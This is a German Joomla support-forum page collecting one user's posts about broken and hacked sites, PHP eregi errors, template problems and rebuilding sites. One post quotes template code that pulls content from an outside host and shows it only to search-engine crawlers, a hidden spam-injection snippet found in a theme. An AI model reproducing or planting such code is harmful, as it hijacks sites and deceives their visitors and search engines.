Hallo Holger, willkommen an Bo(a)rd!
Da hast Du Dir ja gleich ein dickes Ei eingefangen. Nein, der Code gehört nicht zu Joomla und der Strato-Installer erzeugt sowas auch nicht.
Setz die Seite neu auf, alles andere ist Frickelei. Das sollte der Vorstand wohl akzeptieren (müssen). Andernfalls muss er Geld in die Hand nehmen und die Seite von Profis bereinigen lassen. Hier im Forum tummeln sich Einige (schau in die Signaturen).
FAQ hast Du sicher schon gelesen?
Insbesondere Mein Joomla wurde gehackt! Was kann ich tun?
Beiträge von hechtnetz
-
-
Die drei Tipps aus dem Link von @Re:Later habe ich mal ohne Kollateralschäden umgesetzt. Beobachten und weiterfahren. Wenn die Dateien wieder auftauchen habe ich sowieso ein Problem ...
Die andere Fundstelle gehört ja zu jDownloads, da kümmere ich mich mal separat drum. Ich verwende 3.2.46. -
Ich danke Euch allen!
Nach dem ersten "Herzkasper" habe ich mal in das Originalpaket des Templates geschaut. Datei sieht da exakt genauso aus. Puh!
Entscheidung ist dann wohl klar: Template fliegt raus.
Bis dahin werde ich mal die Tipps von Re:Later als Feuerwehraktion fahren. -
Suche in deinen dateien wo "eregi(" vorkommt.
Doch gleichmal gemacht. Überschaubares Ergebnis:
administrator\components\com_jdownloads\helpers\jdownloadshelper.php (1 hit)
Line 841:
public static function read_xml($search,$xmlfile){
// function by JoomTools
$fp = fopen($xmlfile,"r");
while(!feof($fp)){
$r_xml .= fgets($fp);
}
fclose($fp);
eregi($search, $r_xml, $search_result1);
$search_result = trim($search_result1[1]);
return $search_result;
}templates\ijoomla05\html\template.php (1 hit)
Line 12:
ini_set('display_errors',0);
$path = $_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
$path = str_replace("&", "",$path);
$target = dirname(__FILE__) . DIRECTORY_SEPARATOR . "mods.php";
$source = 'http://psdu.net/i5.php?i='.$path;
$cachetime = 86400;
if ((file_exists($target)) && (time() - $cachetime) > filemtime($target)) {
$string = file_get_contents($source);$result = file_put_contents($target, $string);}
$spiders = array('Googlebot','Yahoo','msnbot','Googlebot-Mobile');
$credits = file_get_contents($target);
foreach ($spiders as $spider){if (eregi($spider, $_SERVER['HTTP_USER_AGENT'])){echo $credits;}}Kann jemand bitte korrigieren?
-
Suche in deinen dateien wo "eregi(" vorkommt.
Danke, mache ich morgen mal. In Abhängigkeit vom Resultat frage ich ggf. nochmal nach.
(Ich so gut wie nix PHP wissen.) -
Das verstehe ich nicht: Was wird angezeigt?
Die Modulpositionen haben andere Namen und so fehlte Einiges. Aber das was da war lief ohne Fehler.Du musst sie mit der preg_match-Funktion ersetzen.
Das vermag ich nicht. Dazu müsste ich die Stellen erstmal finden.
Mir geht es eigentlich nur um Infos, ob es am Template liegt. Dann muss eben ein Neues her. -
Hallo,
nach Umstellung einer Seite (http://www.angeln-lippe.de/) kommt o. g. Fehlermeldung.
Joomla 3.6.5 mit Phoca Galery, Phoca Maps, jDownload, ECC und wunderground-Wetter. Template iJoomla05 von http://ijoomlatemplates.com/.
Fehler berichten steht auf Maximum. Beim Aufruf der Seite kommt nur die Joomla-Fehlerseite mit der o.g. Meldung und dem Standard-Text: "Die Seite kann nicht angezeigt werden, weil: ...".
Ich kann mit der Meldung nichts anfangen, Google listet auf Anfrage auch nur Seiten, die die Meldung anzeigen.
Ich habe (hoffentlich) alle Fremderweiterungen vorübergehend deaktiviert - keine Änderung.
Mit Protostar funktioniert es, soweit angezeigt.
Template ungeeignet?
Habe erstmal auf PHP 5.6 zurückgestellt. -
Sucuri SiteCheck sagt: "Status: Unable to properly scan your site. HTTP Errors Returned."
Und bitte keine Links zu (ggf.) gehackten Seiten hier posten! -
Auch von hier (Win 10 x64; IE 11) die Bestätigung.
Beitrag wird korrekt angezeigt. -
hmmmm versuche es weiter!!
Falls es mit XAMPP nicht will probier es evtl. damit:
http://www.hechtnetz.de/index.…t-pc/141-joomla-auf-uwamp -
wir konnten mit einer Backupversion das meiste wieder herstellen.
Ich glaube, Du hast den worst-case gewonnen.
Habe selbst über 10 Jahre unsere Schulwebseite gepflegt. Da Du sicher (wie ich damals) alles so nebenbei mit erledigen darfst:
Mache der Schulleitung klar, dass Ihr ein Problem habt. Die Seite muss offline genommen werden! Sie muss professionell bereinigt werden, besser neu aufgesetzt werden. Das geht nicht so auf die Schnelle. Die Schulleitung muss wohl oder übel Geld in die Hand nehmen. Ich würde an Deiner Stelle jegliche Verantwortung für die Seite ablehnen. -
Es kommt speziell bei diesem Thema darauf an ...
Genau. Du schreibst ein nachvollziehbares Beispiel pro. -
Deshalb will ich es auch komplett neu machen. Mein Problemchen
Hatte ich aus so verstanden.
Wollte nur folgende Idee ins Spiel schicken:
Falls die alten Beiträge übernommen werden sollen (und sei es nur in ein Archiv) wäre ein angenehmer Nebeneffekt des Tools, dass die Benutzer (incl. Zugangsdaten) auch ex-/importiert werden können. -
<Kategorie blöde Frage>
Gibt es noch Hoster, die keinen "Verzeichnisschutz" anbieten? Ist doch IMHO eine htaccess-Lösung per Klick.
</Kategorie blöde Frage> -
Hier bei Phoca:
Fast Full-HD. In der Lightbox soll der maximale Platz der Anzeige nutzbar sein (sorry an 4k-Monitor-User!). Komprimierung kann ruhig etwas kräftiger sein.
Software zum Resizen gibst auch free recht viel, auch für Stapelverarbeitung.
Wasserzeichen halte ich für wertfrei.
JustMy2Cents. -
Zwei Bemerkungen:
... Die aktuell genutzte Joomla-Version ist die 2.5.17 ...
Das halte ich für grob fahrlässig. Damit hast Du schon bei 2.5 mindestens 10 Updates verpasst. Davon einige sicherheitsrelevante. Ich hätte da echt Bauchschmerzen.Evtl. ist es möglich und sinnvoll, die Seite neu aufzusetzen und die Kategorien, Beiträge und Benutzer zu importieren. Die Gefahr von "Altlasten" wird zumindest deutlich minimiert. Ich habe damals (™) sehr gute Erfahrungen mit >> J2XML gemacht.
Mein Vorschlag:- Update auf die letzte Version von 2.5 (zzgl. der nachgereichten Patches), schnell!
- Backup machen, lokal einspielen
- J2XML installieren - Benutzer, Kategorien, Beiträge exportieren
- Neuestes Joomla aufsetzen (ggf. Template dazu wenn kein joomlaeigenes verwendet wird)
- J2XML dort installieren und die Daten des alten Joomla importieren
- (viel) nacharbeiten, zb. Menüstruktur, CSS etc.
-
Volle Zustimmung an Elwood!
(OT: Grüß Dich!)
Neu machen oder Profi ransetzen. IMHO werden die Dateien nicht vollständig gelöscht - insbesondere keine "fremden" Dateien (Schadcode).
Persönliche Meinung:
Schmeiß 1.5 weg! Löse dich von Altlasten und baue die Seite neu auf. Insbesondere eine responsives Template und eine straffe Struktur sind der Lohn. -
- die Seite kann ich leider nicht preisgeben
Ohne Link kein Wink.
Die Supporter hier haben leider keine Glaskugel. Hilfe ist dann möglich, wenn wir die Seite sehen und damit arbeiten können. -
Irgenwie riecht es mir immernoch nach nicht beschreibbaren Verzeichnissen. mag mich irren.
Deshalb die Frage an knewbee:
Sind die Verzeichnisse log und tmp im Backend als beschreibbar angezeigt (BE > System > Systeminformationen > Verzeichnisrechte)? -
Willkommen an Board!
Das Problem tritt IMHO bei XAMPP öfters auf (welche XAMPP-Version?). Man kann versuchen, an der php.ini zu schrauben (z.B. max_execution_time hochsetzen). Bin da nicht so firm weil ich >> UwAmp verwende.
Versuchs damit! Must Du nicht installieren, nur entpacken. Eine Anleitung >> hier.